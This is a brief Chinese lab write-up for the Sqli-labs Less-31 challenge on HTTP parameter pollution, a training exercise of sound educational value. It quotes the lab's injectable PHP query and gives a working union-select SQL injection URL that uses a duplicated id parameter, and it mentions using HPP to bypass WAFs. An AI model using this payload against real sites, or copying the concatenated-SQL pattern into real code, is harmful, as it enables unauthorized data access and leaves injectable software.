Less-31与前面两关的方式是一样的,我们直接看到less-31的sql语句:

$id=$_GET['id'];
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

所以payload为:

http://127.0.0.1/sql/Less-31/login.php?id=1&id=-1") union select 1,database(),3--+

Sqli-labs Less-31 HPP参数污染攻击

 

总结:从以上三关中,我们主要学习到的是不同服务器对于参数的不同处理,HPP的应用有很多,不仅仅是我们上述列出过WAF一个方面,还有可以执行重复操作,可以执行非法操作等。同时针对WAF的绕过,我们这里也仅仅是抛砖引玉,后续的很多的有关HPP的方法需要共同去研究。这也是一个新的方向。

 

参考:https://www.cnblogs.com/lcamry/p/5762946.html

相关文章:

  • 2022-12-23
  • 2021-07-17
  • 2021-08-31
  • 2021-10-26
  • 2021-10-31
  • 2021-04-23
  • 2021-12-16
  • 2021-09-14
猜你喜欢
  • 2021-05-21
  • 2021-11-11
  • 2021-11-13
  • 2021-12-17
  • 2022-12-23
  • 2022-12-23
  • 2021-10-10
相关资源
相似解决方案